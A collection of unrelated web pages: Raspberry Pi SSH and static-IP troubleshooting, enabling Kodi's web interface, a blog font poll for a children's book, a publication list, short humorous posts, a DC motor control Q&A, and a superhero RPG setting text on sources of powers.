I have set up the Raspberry Pi to work fine with Raspbian on Wi-Fi, etc., but when I would try to connect after a reset the IP address would change. Then I spent all this time changing the configurations to get a static IP address, and now that it is static, all of a sudden I cannot connect to the Raspberry Pi. I have no external monitor, so everything has been done headless, but now I cannot connect even over eth0 (even if I ping the address that I get with arp -a, the connection gives timeout). What is the issue? (I am using OS X). Here is the last attempt, and I also tried diff port. ssh pi@ -vvv OpenSSH_6.2p2, OSSLShim 0.9.8r 8 Dec 2011 debug1: Reading configuration data /etc/ssh_config debug2: ssh_connect: needpriv 0 debug1: Connecting to [] port 22. debug1: connect to address port 22: Operation timed out ssh: connect to host port 22: Operation timed out $ ssh pi@ -p 80 ssh: connect to host port 80: Operation timed out This is wpa_supplicant file ctrl_interface=DIR=/var/wpa_supplicant Group=netdev ssid="my network" interfaces file auto lo iface lo inet loopback iface etho0 inet dhcp allow-hotplug wlan0 iface wlan0 inet dhcp wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf iface default inet dhcp • Unless you tell us what you did we can't help either. Setting a static address is almost always the WRONG thing to do. If you want it not to change, you are usually better reserving an IP on your router. Even better install netatalk on the Pi and connect from OS X to `raspberrypi.local' – Milliways Feb 22 '15 at 22:58 • only thing that I changed was the wpa_sup file and wrote -iface wlan0 inet static- whereas it used to say auto and read from another config file. All I am trying to figure out is how to get SSH capability back on eth0 so I can figure out what is acting up. As it is now I cannot access the pi at all – Maximus12793 Feb 23 '15 at 7:17 • If you have anything other than iface wlan0 inet manual wpa_supplicant won't do anything. If you have broken this and can't get into the system remove the WIfi adapter, and use Ethernet. NOTE you still haven't provided any information about your configuration (physical or configuration). The "only thing that I changed" comment is usually an indication that the questioner can't or won't supply the needed information to help solve the problem. – Milliways Feb 23 '15 at 10:58 • yes, as I don't know what info you want me to post/what info would be helpful. iface wlan0 inet manual <= this was changed to static similar to this raspberrypi.org/forums/viewtopic.php?f=28&t=63754 . I tried with the wifi dongle off and it seemed to not change anything, as the pi won't show up using the arp -a command even when it is connected only via ethernet. Outside of that, I don't know what else was changed, I manually put an ip / gateway etc. vs the wlan0 auto. I also followed this guide weworkweplay.com/play/… – Maximus12793 Feb 24 '15 at 7:19 • The link you quoted states "Start by booting the Raspberry Pi, connected to a display and a keyboard" but you have told us you don't have these. If you had actually followed this guide it would have worked. It also states "Change iface wlan0 inet dhcp into iface wlan0 inet static". Which is not normal (I still think static addresses are misguided). If you can't post the contents of /etc/network/interfaces and wpa_supplicant.conf we can't help you. – Milliways Feb 24 '15 at 7:42 Your interfaces file states: iface etho0 inet dhcp which is obviously wrong. It should be eth0. And are you sure dhcp is active otherwise the interface will not get an IP address. Issue the ifconfig command to find out if there's an IP address used by the interface. • sorry that was a typo. its eth0 ...how do i find out if dhcp is active on the pi? the inet address for eth0, lo, and wlan0 are each unqiue, the issue is that wlan0 keeps changing every time the pi turns off, so is very hard to find it until i connect with ethernet. I signed up with no-ip and got that working but I cannot figure out if the reason i cannot connect is still due to the port fowarding issue – Maximus12793 Mar 1 '15 at 5:31 • Issue ifconfig and paste the output here please. – wie5Ooma Mar 1 '15 at 22:39 As I stated in my original comment, if you want the IP address not to change, you are usually better reserving an IP address on your router. Setting a static address is a brute-force solution, which won't always work. If you go to a network with a different range (mine is 10.1.1.x) it won't work, and even if it uses the same may conflict with other devices. You would be better to install netatalk on the Raspberry Pi and let OS X discover the IP address. Connect from OS X to `raspberrypi.local'. NOTE: You still should have iface wlan0 inet manual, and if you are going to use id_str="home", you need iface home inet dhcp. • wow that nettalk is awesome. the only issue is I do not have access to the router in order to edit ports etc. do you know of a way I can do it through the pi itself? – Maximus12793 Mar 1 '15 at 4:37 • raspberrypi.org/forums/viewtopic.php?f=91&t=22660 is doing this ok where he sets it to static? the I was able to access the router but it asks for an ip (in my case is constantly changing) so im not sure how to open a port for that case. any idea? – Maximus12793 Mar 1 '15 at 6:13 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41455
So, i found myself with a raspberry with openelec installed at my father's house, my tv remote doesn't work via hdmi cec and i can't find a mouse anywhere home, so I can't navigate around the menus or use the pi. If i could just open the pi http access i could use my phone as a remote with the Kore app and everything would be solved. I tried looking around at the Openelec wiki but i couldn't find anything about it, only a mention of a config.txt file, but it didn't have anything useful for me. Does anybody know how would i do that via ssh or any other way? I have my laptop with me and the raspi has ssh and Samba access. From Kodi's docs on the web interface: Method 1 / guisettings.xml Edit the guisettings.xml file in the userdata folder and look for the following settings under <services>, and make sure they are set to "true". You'll have to look for them a little bit, because there among several other settings. Assuming you have not set a password or changed other default settings, this should work: <esallinterfaces> - true <webserver> - true <zeroconf> - true Save the file and restart Kodi. Method 2 / advancedsettings.xml While using an advancedsettings.xml file might be easier to enable these services, doing so will hide them from the normal Kodi GUI. You will have to remove or edit the advancedsettings.xml file to turn these settings back off, which can be confusing later on if you forgot you have an advancedsettings.xml file. Create a plain text file (no rich text formatting, don't use .doc, etc) and save it as advancedsettings.xml. Make sure that the file extension is ".xml" and not ".txt" or ".xml.txt". Cut and paste this into your new plain text file: Save this file in your userdata folder Note: If you have an existing advancedsettings.xml file, make sure the tags are between the main tags. Restart Kodi. • Oh, damn i missed that.. sorry for the inconvenience. Everything is solved now, thanks for your help! – Aleix Sanchis Jul 16 '16 at 21:19 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41485
Stuck on Fonts Instead of writing my next poem like a good little blogger, I have been obsessing about which font to use for the title of one of my next book covers for the last three hours.  I narrowed down the choices to 4 fonts from 15.  This is a rough sketch for the front cover of “Pirate Bear” in the 4 different fonts. Which font do you like the most?  I am leaning towards one, but I’m not entirely convinced. To give you an idea of the story, here are the first two pages of “Pirate Bear”: Pirate Bear 1-2d Any input on the font style would be very welcome! 🙂 148 thoughts on “Stuck on Fonts 1. Third one! 1. Okay, so that’s one vote for #3. Thank you! 🙂 2. Looks like a fun book, Sonya. I may be no help but like both one and four. One because it doesn’t take away from the illustration and four because it looks piratey to me but also doesn’t detract from the picture.😊 1. Alright, so one vote for #1 and one vote for #4. Thanks, Jordy! 🙂 1. That’s two votes for #3. Thank you! 🙂 3. seems to match “pirate” concept to me. Best of luck! 1. Second vote for #4. Thanks for your input! 🙂 4. 4 lol 😊 It’s bold and clear. Just sayin 1. Lol thank you! That’s three votes for #4. 😊🌸 5. One is the best choice if the ones you have given, but I’m thinking something a little more playful 1. Hmm, interesting. So that’s two votes for #1, with a little more playfulness. Thank you! 🙂 6. Font #3. Clear is definitely important, but it’s clear enough to use for a title only and has more style or character than the others. 1. That’s three votes for #3. I like your explanation as to why you like that font. Thank you so much for your input! 🙂 1. Ooo, you are the first one to vote for #2. Thank you! 🙂 7. Def. not no 2! It’s too thin and delicate. 🥴 Think I would settle for no 4! Rough, and makes me think of older times. Vikings and such. Could that one fit the story? 😉😄 1. That’s four for #4 then. So far #4 is leading with the votes. Vikings would be hilarious, but I didn’t write any into my story. I have bunnies, crocodiles, and one bear, no Vikings. 🙂 1. And your drawing of the bear, makes him look as bold and ferocious as any viking might have been… … at least in my fantasy. 😀 1. Lol then you can call him Viking Bear instead of Pirate Bear. But only you. 😉 1. How nice of you!!! ❤ I'll cherish that! Anyway! Wasn't vikings actually some kind of pirates? Though not on the sea, but in far away countries… like east of Mediterranean sea. From Iceland or Norway to Constantinople (now Istanbul). I'm just babbling… 😉 1. Lol that’s okay. You babble very coherently. 🙂 1. You just tied up #3 and #4, now both with four votes each. Thank you for the vote! 🙂 8. I understand why it’s so hard to choose! I say, trust your instincts, feline or otherwise 😊 1. After three hours of humming and hawing, my instincts were telling me to gather intel hehe. 1. Intel seems to be humming and hawing a bit too!? 1. Lol yes, that makes things a little more tricky 😉 2. It’s taken me a bit to decide, and I kept changing my vote in the way to the polling booth, but I think…. 3! (Or 1). 1. LOL err alright, I will put you down for #3! Thank you for voting! 🙂 9. I liked 1 initially, then I thought 4 was bold and would work well, then I moved to 3 as being more piratey. So, not giving my vote for 2 – liking 3 more, but 1 and 4 nearly up there, too. Hope this helps. 1. Okay, I’m going to put your vote down for #3, which puts #3 in the lead with five votes. This definitely helps! Thank you! 🙂 1. You love that I’m so indecisive? 1. Lol I was just teasing. 😜 Thank you! 😊🌸 10. First or last would be my choice Cubby. When will the book be published? 1. Hmm, I will put your vote down for #3 then since you listed it first. I am hoping “Pirate Bear” will be ready by April, although it be later if the illustrator needs more time. 1. I’m putting your vote down for #4! That makes for a total of five votes for #4 and six votes for #3. Thank you for voting! 🙂 11. I like 3 and 4, but would choose 4 as it stands out more, and is clearer to read for children especially. 1. You just tied up 3 and 4 again, both at six votes each. Thank you for the explanation and vote! 🙂 12. Pirate Bear must be very bold…..4 for me 1. Hmm, good point. That’s the seventh vote for #4. Thank you! 🙂 13. Possibly 4. I like 1 but it’s maybe a little formal and 4 seems easier for children to read than 3. If 2 had broader strokes it would be up there, though. 1. Okay, I’m putting you down for #4 then. That makes eight votes for #4. Thank you for voting! 🙂 14. The third font is my choice. It goes well with the pirate theme of a swashbuckling bear. 1. #4 was starting to get ahead but you are closing the gap again. That’s seven votes #3 now to eight votes for #4. Thanks for your input! 🙂 15. I like #4. Though I haven’t read through all your comments, a brief scan suggests a lot of variability in preference. I’d say that means you might want to go with what YOU like best 🙂 1. I kind of like all of them, which is why I was so stuck. Your vote puts #4 at a total of nine, in the lead. 🙂 16. I think number three looks like it was slashed with a rapier, so it would be more pirate-appropriate, but a WIDER slash, like with a cutlass, would be even better! 1. So I’ll put down your vote for #3 then. Hmm, wider slash with a cutlass… something to look into. Thank you, soberflight! 🙂 17. I like the second one 😊 1. Ah, the second one was getting no love. That’s the second vote for #2. Thanks for you input! 🙂 1. You’re welcome! 😊 Waiting patiently to what your final choice is. 1. It’s a pretty tight race so far. I’ll do the reveal when the colored version is ready. 🙂 18. The Graphite Syringe February 5, 2019 — 6:45 am Third one 1. And you just tied it up again at nine votes each for #3 and #4. Thank you for voting! 🙂 19. Number 3 – looks like it is meant to be for a pirate theme. 1. So that’s the tenth vote for # 3 then. Thanks for the vote! 🙂 1. Ooo that’s the fourth vote for #1. Thank you! 🙂 20. #4 – it’s bold and easy to read. #1 is easier to read, but not as fun for a Pirate Bear. #3 is more fun, but harder to read. 1. You tied up #4 and #3 again with ten votes each. Thank you for the vote and explanations! 🙂 1. I’ll put your vote down for #1 and #4. You have such an artistic eye, so I find your choices very interesting. Thank you! 🙂 21. Ooh… not third. I meant 4th! It should be either 1st or 4th. This looks so interesting, Cubby! Reminds me a little of TaleSpin, if Baloo were the villain instead of the loving, bumbling hero. 😋 1. I’m putting you down for both #1 and #4 then. I’m hoping this book will appeal to a lot of kids and adults… and cat lovers. It’s got a cat in it. 😊 1. I’m sure it will. I love the excerpt you have shared. Kinda want to know what’s next 😹 is my cat emoji doing the trick to get you to reveal more? 😸 I kid, of course, Cubby! It’s gonna be great! 💕 1. Lol I will be revealing more when it gets closer to the release date. 😊💜🌸 22. # 4. It draws the eye to the title. I also like # 3, but it isn’t bold enough, so NUMBER 4 gets my vote. Best of luck with your new book. 🙂 1. #4 is coming out further ahead with your vote with a total of 13. #3 is second with ten votes. Thank you for your vote! 🙂 23. Three or four. Can’t decide! 1. You and me both! I’ll put you down for one of each. 🙂 24. Viner font because that seems most appropriate for words like “Pirate Bear.” They lend character to the title. 1. #4 had been pulling ahead, but you are closing the gap again with your vote for #3. Thank you for your explanation as well! 🙂 25. I say #4 – it’s as bold as a pirate. x 1. Alright! It definitely is bold. Thank you for the input! 🙂 26. Stylistically I like 3. 1 is good too. But, and I’m going to preach a little preach here based on experience, whichever one you choose please remember to make it accessible. The partially sighted are excluded from a lot of things simply by style choices. But I’m confident you’re way ahead of me on that already. 1. Hmm, honestly I haven’t given the partially sighted too much consideration, but I do know I want the inside font to be a decent size and easy to read. I have seen some fonts in children’s books that are really difficult even for the almost fully sighted to make out. I can’t imagine what that would be like for the partially sighted. Thank you very much for the advice and vote! 🙂 27. Personally, I like # 1 the best. I’m sure it’ll be cute either way 1. Interesting! I’ll put your vote down for #1. Thank you for voting! 🙂 28. No 1 for me and looks like a lovely book in the making 29. I would definitely go with number 4. It’s swashbuckling and bold. 1. I love that word, “swashbuckling.” Thank you for your input! 🙂 30. Cubby one of my friends said she was going to order a few 🙂 and pass the info to her friends. Fingers crossed Jen 1. Awww that is so nice. Thank you so much for reaching out to your friends. 😊🌹😘💖 1. No problem. 🙂 Especially if I believe 2. And you’re very welcome 😊❤ 31. In the shoes of the children I’ll say the thicker font, 4th (thick and unserious)… like which kid doesn’t like a thinker lollipop (lol.) It must be an interesting book. 1. LOL a thicker lollipop, that’s hilarious. Thanks so much for your vote! 🙂 1. Yes, that book is really a candly. I can see it 32. I hope I’m not too late to the font party. I love a good font party. I see all the good snacks are gone. I like the third font the best, but I think the forth stands out and is most legible. That Pirate Bear does not sound like a nice gentleman. I bet he’s the one who ate all the good snacks.🚣🐻 (I don’t have any pirate emojis, so you get rowboat guy, and I’m not sure that’s a bear.) 1. The third and fourth fonts have been the most popular so far. With your vote for #3, the total becomes fourteen for #3 and seventeen for #4. Pirate Bear won’t say who ate the snacks, but it probably is him as I see some crumbs on his fur. 🐻 Apparently that is a bear. 🐰 And that’s a bunny. 🐊 And that’s a crocodile. The three animals that will appear in my book. 1. It looks interesting and exciting. How far are you from publishing it? 1. I think it will be a few more months. Javier, the illustrator, has just finished all the rough sketches. I don’t know how long the coloring will take, but I am hoping it will be ready to be released for May. 1. You don’t want it too close to the release of your first book, anyway, right? Why are you using a different illustrator? It seems to me that similar artwork would help with the familiarity. Or do you want to put out a variety? 1. Actually, they say it’s a better strategy to release multiple books one after another in close succession so that you don’t lose momentum, which makes my timing completely off for this one. As for using a different illustrator, that’s because I think each illustrator has a certain style that works best for different stories. Kate, the illustrator of “I Want an Ostrich,” has a really wonderful whimsical, cute, semi-cartoon style that I think works well for that book as well as for “My Teacher Dad.” Javier, the illustrator for “Pirate Bear,” has a style more suited for creating realistic characters in realistically surreal settings. I have a third illustrator as well working on my fourth book. I would have used Kate again for that one, but her schedule is already ridiculously full. 1. Well, you have obviously done your homework. That all makes sense. Chinchilla Books is going to be an empire. I’m excited for you. 1. Ha I don’t know about an empire, but I’m sure as heck gonna try to turn it into something that can pay the bills. 🙂 1. You keep the modest goals. I’ll make the huge plans. We’ll settle for something in the middle. 1. I was thinking I would have big bills. 😉 2. 👍💰💴💵💶💷💸💲💱 3. Well, first I have to buy a dinosaur. That’s going to cost a fortune. 4. You don’t have the dino, yet? Have you considered a rescue? I think they’re less expensive. 5. I need more than one dino. I should have said, “first I have to buy another dinosaur.” That’s a good idea about a rescue. I’ll have to look into that. 6. You just have to be careful. There’s a big difference between a traumatized cat or dog and a traumatized dinosaur. 7. You are the pet guru. *takes notes* 8. Yeah, just ask the little dogs with the enormous snowballs in their ears. 33. If you’re still taking votes – 1 or 4. 1. Okay! I’ll put you down for one vote #1 and one vote #4. Thank you for voting! 🙂 34. I got in on the decision cover process a day late. My choice is #1 is the Top Pick. The letters are more Kid Friendly for Early Readers to recognize. It just needs needs to be a little darker. 1. Not too late at all. I appreciate your input and your explanation as to why you chose #1. Thank you! 😊💜 1. You are welcome. I love that you can illustrate too. I have some rhyme books written I wish I could illustrate. 1. HAHAHA sorry I’m laughing because I can’t illustrate worth a stick figure. These illustrations are by Javier Gimenez Ratti. I just hope I’ll break even at the end. 🙂 1. I’m thinking I’ll just do mine with stick figures. That way it’s all good. I’ve thought about hiring someone, but finances just aren’t there yet. Maybe one day. 1. I understand what you’re saying. Now, if you could write a story about stickmen, that would be perfect! 🙂 35. Charlee: “Our Dada says we have to vote for #3, so here we are voting for #3!” Chaplin: “He says he knows how you feel, he’s spent many an hour picking out fonts for his book covers, too, and many more deciding exactly where they should go and how big they should be and things like that.” Charlee: “It all sounds like too much work for us. We would rather just sleep!” 1. You only get one vote between the three of you, so I’m putting down one vote for #3. Thank you for voting! It’s a close race between #3 and #4. 🙂 It’s amazing how all the little details can take so much time. But I get the feeling you may have slightly obsessive-compulsive tendencies like I do. 😉 36. I like number 3 the best for two reasons. First it seems to match the style you used in the story. Second…I was my favorite before I saw the first page of the book. 😁😁 1. This is a really tight race! #4 is now only ahead by three votes. Thanks for voting! 🙂 37. Number three – but can you have more than one depending on the flavor of your post? 1. I only get one choice for my cover, unless I want to make it different for paperback and hardcover versions…which I could do. Hmm, that’s something to think about. Thank you! 🙂 1. Yes! The hardcover is more serious and formal while the paperback is a little bit flighty and less formal? Like trying to choose between wearing a suit and tie or just slacks and a short-sleaze shirt! Does that make any sense at all? 1. It definitely does! This is some serious food for thought. Which makes me hungry. Need brain food. 38. Oops! Forgot to vote. I like font #1. 1. Thank you for your vote! 😀 Leave a Reply to Nina Gerber Cancel reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s %d bloggers like this:
global_01_local_0_shard_00002368_processed.jsonl/41507
Skip to content Research at St Andrews Related by author 1. Open Scholarship and the need for collective action Neylon, C., Belso, R., Bijsterbosch, M., Cordewener, B., Foncel, J., Friesike, S., Fyfe, A., Jacobs, N., Katerbow, M., Laakso, M. & Sesink, L., 11 Oct 2019, Bristol : Knowledge Exchange. 97 p. Research output: Book/ReportBook 2. Scientific Publications Fyfe, A., 27 Sep 2019, Companion to the History of the Book (2nd edition). Rose, J. & Eliot, S. (eds.). Wiley-Blackwell Research output: Chapter in Book/Report/Conference proceedingChapter 3. Managing the growth of peer review at the Royal Society journals, 1865-1965 Fyfe, A., Squazzoni, F., Torny, D. & Dondio, P., 15 Jul 2019, In : Science, Technology and Human Values. Online First, 25 p. Research output: Contribution to journalArticle 4. What the history of copyright in academic publishing tells us about Open Research Fyfe, A., 3 Jun 2019 Research output: Non-textual formWeb publication/site 5. It's not all about the money: To help learned societies adjust to Plan S, treat them as more than just publishers Fyfe, A., 1 May 2019, Research Fortnight, p. 15 1 p. Research output: Contribution to specialist publicationArticle Related by journal ID: 256169144
global_01_local_0_shard_00002368_processed.jsonl/41516
Taking Back Control Proper British weather Cold and wet and grey Once we leave the EU We can have it every day Previous post Top Five Places People Lose Phones In The Building By the sink in the loo On top of the cistern in the loo On the window sill in the loo Perched precariously on the radiator in the loo Somewhere Next post What A May Day!
global_01_local_0_shard_00002368_processed.jsonl/41517
I am having some trouble understanding how to practically use the speed-torque curve of a DC motor. I understand that the gradient of the speed-torque curve is defined by the design of the motor, the exact position of the curve depending on the voltage applied. So if the voltage is changed the speed-torque curve is also changed but remains parallel to the initial curve before the voltage was changed. See figure below. enter image description here So my intuitive guess is that when using the motor at a given desired operation point (desired speed and desired torque), the corresponding speed-torque curve Cd has a gradient specified in the data sheet of the motor and passes through the operation point. This curve Cd is obtained at a corresponding voltage Vd. See diagram below. enter image description here So my next guess is that in order to have the motor operate at this desired operation point, you have to set the voltage applied to the motor to Vd, and apply a current Id (computed using the torque and the torque constant). Now from what I read this is not what is done in DC motor controllers. These seem to only drive the motor using current and some sort of PWM magic as is shown in the following diagram by maxon. enter image description here Anyone knows why voltage is not used in DC motor control and only current is? I do not understand how you can set the speed if you do not modify the voltage? And what is PWM useful for? I have looked for hours over the internet and could not find anything relevant. The problem is that you cannot control both the voltage and the current. You apply a voltage, and the motor draws whatever current it wants (subject to your ability to supply that current). Alternatively, you make a current controller which automatically adjusts the voltage to maintain the desired current. An analogy would be pushing an object through honey. Voltage is equivalent to the force you're applying, and current is equivalent to the speed of the object. The object moves at a speed which depends on how hard you're pushing, and the dimensions of the object. You cannot choose to push gently and quickly, and you cannot choose to push really hard and slowly. If you want the object to move at a certain speed, you have no choice but to adjust the amount of force you apply until it moves at that speed. If it's moving too fast, you reduce the force. Too slow, and you increase the force. This is how a motor is controlled. PWM 'magic' is just a way to control the voltage that doesn't cause the voltage controller to get really hot. (The alternative is a linear voltage source, which will get really hot). Before we get into what's happening in the motor controller, it would be worth looking at a different graph: Motor current torque graph Here we can see that the torque produced by the motor is purely a function of the current flowing through the windings, and it's pretty linear. If you want to produce a certain torque at the motor, all you need to do is look up on the graph for the current required, then tell your current controller to deliver this current. It does this by constantly measuring the actual current, and adjusting the voltage at the motor (using PWM magic). Now we have a very nice situation for our robot's controller. Assuming a world with no friction, motor torque is proportional to acceleration. If you can control the acceleration, then you can easily control the velocity and position of the motor. The motor position controller knows the trajectory it needs from the motor, and can calculate how much torque it needs at every point during this trajectory (because it knows the acceleration at every point in the trajectory). It's also looking at the actual position of the motor, which won't quite be correct because of friction, and uses that position error to adjust the amount of torque it wants. It then converts the torque demand into a current demand, and gives that to the current controller. And there you have a servo. • $\begingroup$ Ok, so what I understand is that the end-variable actually adjusted and input in the motor is voltage U. This voltage U is adjusted so as to obtain desired current Id inside the motor. Now what's the relation between U and Id? I mean if observed I != Id how should U be adjusted? Is this relation simply U = R x Id? (with R being the terminal resistance of the motor given in the data sheet). I think I am beginning to get there! $\endgroup$ – arennuit Sep 3 '14 at 15:12 • $\begingroup$ Also another thing I understood is that the voltage applied to the motor is actually not U, but Upwm. Upwm being a PWM chopped signal which mean is U. And the reason for using Upwm rather than U lies in some kind of thermal reason. Is that right? $\endgroup$ – arennuit Sep 3 '14 at 15:16 • $\begingroup$ @arennuit - A motor acts nothing like a resistor, so the only way to control the current is with some active current controller. You can see on your diagram, the actual current is measured, and fed back to the current controller. But that's another question, and one which is probably better asked on Electronics Stack Exchange. $\endgroup$ – Rocketmagnet Sep 3 '14 at 15:26 • 1 $\begingroup$ @arennuit - As for the reason for using PWM, that's another question too. But briefly, if you turn a switch (e.g. transistor) fully on or fully off, then there's very little heating. If you try to limit the current by turning it partially on, then it gets warm. Imagine the switch as your hands, and the current as a rope being pulled through them. If you hold the rope tight so it can't move, or if you let the rope pull through completely freely, then everything's fine. But if you try to slow the rope down by squeezing on it, then you can get serious burns. $\endgroup$ – Rocketmagnet Sep 3 '14 at 15:32 • $\begingroup$ Your parabols are very much self explaining indeed. Thanks a lot Rocketmagnet! $\endgroup$ – arennuit Sep 4 '14 at 8:42 Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41537
Champions – Sources of Super-Powers And today it’s a little something for Aurora Ward and the Emergence Campaign. There are really only four basic mechanisms underlying “super powers” Conventional Technology: The stuff that works under normal, well-understood, physical laws and is subject to all the associated limitations. It respects leverage, entropy, structural limitations, conservation principles, and all the rest. Conventional Technology includes: • Biological Adaptions: Scales, muscles, visual adaptions, tentacles, DNA… all the adaptions that you can find in ordinary creatures or produce by genetic engineering. • Neurological Adaptions: Skills (including the martial arts), conscious & subconscious (intuition) thought, knowledge, reflexes, and other forms of data-processing. While not technically “super” powers, the abilities of experts in various fields often seems superhuman to the untrained – and can easily blur into psychic abilities or c’hi powers. • External Technology: Clubs, cars, cruise missiles, lasers, drugs, and more. Interestingly, external technology can be scaled up almost indefinitely, but the required size scales up faster than the power output. This is, of course, what immediately comes to mind • Internal Technology: From scraped pieces of cocoanut shell to patch broken skulls on through pacemakers, oxygenating nanites, and symbionts, internal technology covers items which work on the inside of your body. The limitations here are even more stringent than for external technology – but it’s easily concealable and can provide functions that biological adaptions have a very hard time with. Super-Technology” relies on the exotic energies channeled into reality by the complex nuclei of group one transuranics. It can pack ten to a hundred time more power into an given device than conventional technology would permit – as well as evade some of the limitations of conventional science. Super Technology can create faster-than-light drives, force fields, anti-gravity, and even moderate-range instantaneous teleportation devices. It can even access some other aspects of the normal universe and alternate probability lines – even if that is a rarely-exploited ability; technological navigation of probability lines is extremely difficult. In general, super technology appears in the same four basic categories as conventional technology; it’s just better – if far more expensive. Parapsychological Powers operate on the astral – or “mentational” – level of reality. In general, access to versatile parapsychological powers requires at least some level of conscious thought and the ability to handle abstractions as well as a fairly complex neural network (specific abilities can occur in much more primitive neural nets, but it is notable that parapsychological powers are often very weak or almost unnoticeable until the final stages of neural pruning). Given that such powers tend to “run in families” there is fairly obviously a strong genetic component. Parapsychological powers can access the Imaginal Realms, as well as the “higher sephiroth” – the conceptual planes common to ever-increasing numbers of universes. Unfortunately, the energy levels of the higher sephiroth increase in proportion to the sheaf of contributing universes – and so rise exponentially, and dangerously, as the concepts become more abstract. Thus attempting to tap into the higher sephiroth – or to use them to travel to differing universes by parapsychological means – is extremely hazardous. Perhaps fortunately, the only known ways to tap into the power of the higher sephiroth is to either summon an entity therefrom or to go to them, internalize some of their power with their concept, and return. Either is extremely dangerous; such entities are extremely powerful while a direct link between a material dimension and a higher sephiroth can easily lead to flooding massive areas of the material dimension with insupportable amounts of raw power. • Psychic Powers operate almost purely on the astral level and involve only personal energies (both physical and magical). While every human (and probably every sapient life form) seems to have some potential for such abilities – experiencing moments of telepathy, clairvoyance, precognition, astral awareness, dream-interaction, and so on – relatively few are capable of actually controlling their abilities. • C’hi Powers operate by channeling personal energies through astral space – allowing remarkable physical feats, telekinetic manipulations, minor healings, and similar effects. Once again, basic manifestations of this ability – so-called “hysterical strength”, mind-over-body manifestations, and biocontrol – seem to be inherent in sapient life. In virtually all cases, however, such abilities only seem to function in rare flashes, usually occurring only under extreme stress. Bringing such abilities under control typically requires intensive self-discipline and extensive training. This is likely a survival adaption; careless depletion of the bodies personal energies can easily be fatal – so individuals who can do so easily tend not to pass on the trait. Psionic Abilities tap into external physical energies through astral space employing the exotic properties of group two transuranic nuclei. Unfortunately, using the central nervous system as an energy transfomer is a considerable strain and tends to dump waste energies into the brain; higher end psionic abilities tend to lead to brain damage and/or insanity. At least on Earth, Psionic Abilities are also known as “Mutant Powers”, thanks in part to their strong genetic component. Unfortunately, those same genetic components mixed at random while their active expression was inhibited by the Rho-Field – leading to a random distribution of psionic potentials in the population, including many self-contradictory combinations. Attempts at artificial, rapid, triggering of psionic abilities often dump excessive amounts of energy into the central nervous system – giving such attempts (intentional or not) a very high casualty rate indeed. Of course, since major trauma – whether physical or psychological – is one of the major triggering mechanisms, it’s often difficult to sort “death from psionic overload” from “death by electrocution” (or whatever). This is one major reason why there hasn’t been much of an attempt to control triggering devices. People have achieved breakthrough by being struck by lightning, trapped in fires, exposed to odd chemicals and/or radiation, by magic, by receiving really bad news, by entering puberty, by taking drugs, by suffering severe emotional traumas, by a desire to rescue or protect others, by being poisoned, and so on. It’s widely suspected that – if you have the potential – sooner or later SOMETHING is likely to bring it out. In general, Psionic abilities can be divided into two basic categories: • Unconscious Psionic Abilities tend to be highly specific; abilities such as “super strength”, being able to regenerate from almost any wound, transforming into some other substance while retaining self-awareness and the ability to function, and similar abilities, all fall into this group. In general, “required secondary powers” fall into this group – as do the abilities of many “super-inventors”, power-armor users, and others who apparently rely on “devices” – which is why many super-“inventions” never spread through the general culture; they will not function in the absence of their creator. • Conscious Psionic Abilities tend to be considerably more versatile – but in general have a fairly steep learning curve; learning to exploit the ramifications of telekinesis, or weather control, or many other abilities is a complex and dangerous process. The fact that training for more power causes ever-increasing mental disturbances does not help either. Magic seems to be synonymous with “life energy” or “vital force” – and appears to be a truly fundamental force; universes, in all their near-infinite variety, appear to be manifestations of life-energies endless attempt to express itself. As such, magic defines the laws of a universe, allows such laws to be violated, and defines the barriers between universes. Magic can pretty much go anywhere and do anything – if you can just harness enough of it. That, of course, is the tricky part – and so magical abilities tend to be defined and limited by where you’re getting the power from. Magic use can be either conscious or subconscious, but isn’t as subject to a strict classification scheme as parapsychological powers; many or even most magical effects have both conscious and subconscious components. • Personal Magic is – obviously enough – powered by the user’s personal life force. While this is a relatively easy and intuitive source of power, personal magic is a strictly limited resource in most cases (occasional extremely powerful spirits do commonly, mostly inhabiting bodies that require a good deal of magic to function under the local laws of physics. Such entities are often virtually immortal – but they also reproduce very, very, slowly, since spirits capable of sustaining such an existence are extremely rare). It’s fairly easy to learn to use a bit of personal magic, and the more power that a spirit has available the easier it is to learn to use. Injured creatures will instinctively use personal magic to maintain their physical lives and heal themselves. This is why, for example, single shots from basic personal firearms (1-2d6 RKA) are virtually never fatal in themselves for a healthy adult; personal magic is instinctively used for self-defense and survival. This is also why there’s generally little or no scarring, few long-term consequences of injuries, and rapid recovery. • Ambient Magic is the general “background” of life-force in a universe – the force responsible for the spontaneous appearance of new life forms and a driving force of adaption in existing ones. It can be tapped to perform a wide variety of feats – but the amount of power available in particular times and places is wildly variable. Still, where it is available – and especially where it’s highly concentrated – ambient magic can power abilities Pocket Dimensions very, VERY, often have high levels of Ambient Magic; While they don’t have enough life-force to expand into full-blown universes, they must still have enough to avoid collapse – which becomes increasingly difficult as they become smaller, an effect which could be likened to “surface tension”. Very small universes require a good deal of internal life-force pressure – and thus often spawn various “living forces”. Pockets with enough life-force to expand undergo “inflation” and grow to full-size universes, filled with life – which can be very very strange and unlikely early in the history of a universe when the concentration of life force is still extremely high. • Channeling Magic draws magic from inanimate sources elsewhere. While a sizeable portion of the available power goes to sustaining the link, and more is lost due to the lack of active control on the source end, Channeling can support reliable suites of powers – their exact nature more or less limited by the tendencies of the source being tapped. Group three transuranics, with nuclei complex enough to extend into other dimensions, can act as links for Channeling – making items incorporating such “magical materials” far easier to turn into magical devices. • Invocation Magic draws magic from living sources elsewhere – typically extremely powerful mages operating in high-magic areas, “living forces”, or cosmic entities. It’s considerably more efficient than Channeling since the source can exert active control over the magic – but it’s also considerably more restricted; if you want a living being to lend you it’s power, it’s got to want to do so. Thus invocation magic tends to have weird side effects, strange conditions attached to its use, and other annoyances. The availability of invocations is why there have been few attempts to control the market in magical devices. It’s often easier to find an invocation than to find a really powerful device – and an invocation is generally a lot harder to take away from someone. Still, quite a few specific devices have been confiscated. That doesn’t make them illegal in themselves, but it does mean that if you acquire one, it’s probably stolen.
global_01_local_0_shard_00002368_processed.jsonl/41545
